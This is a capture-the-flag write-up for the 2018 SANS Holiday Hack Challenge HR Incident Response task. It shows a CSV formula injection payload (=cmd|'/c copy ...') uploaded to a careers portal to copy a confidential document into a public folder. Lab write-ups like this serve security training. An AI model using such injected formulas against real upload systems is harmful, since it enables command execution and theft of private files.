March 14, 2019

HR Incident Response

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup


1- Recommended Watch Brian Hostetler’ talk about CSV injection :

2- Let’s begin with creating our CSV injection file, First we need to find publicly accessible folder to fetch the file “candidate_evaluation.docx” into , try modify url by adding the name of the file we are looking for :


You will get this error :

Publicly accessible file served from:

C:\careerportal\resources\public\ not found......

Try:’file name you are looking for’

Which reveals the location of the publicly accessible folder


And the location of the file after successfully fetch it to public folder

3- Let’s shape our PowerShell command we will use to copy the file to public folder :

=cmd|’/c copy “C:\candidate_evaluation.docx” “C:\careerportal\resources\public\” ‘

You can use Microsoft excel sheet (or similar software ) to create the file or just use notepad by adding “;” to the end of the command to be create csv file with one raw and one column :

=cmd|’/c copy “C:\candidate_evaluation.docx” “C:\careerportal\resources\public\” ‘;

4- Upload the file into Elf InfoSec Careers website .

5- Goto url for our file ( you need to wait about a minute for the file to accessible ) :

6-Open the file and read the information , we are looking for the job applicant whose name begins with “K.”:


the job applicant we are looking for is Krampus

7- Let’s find which terrorist organization is secretly supported by him :


the terrorist organization is Fancy Beaver.

📟 Go to your Badge > Objectives > Enter Fancy Beaver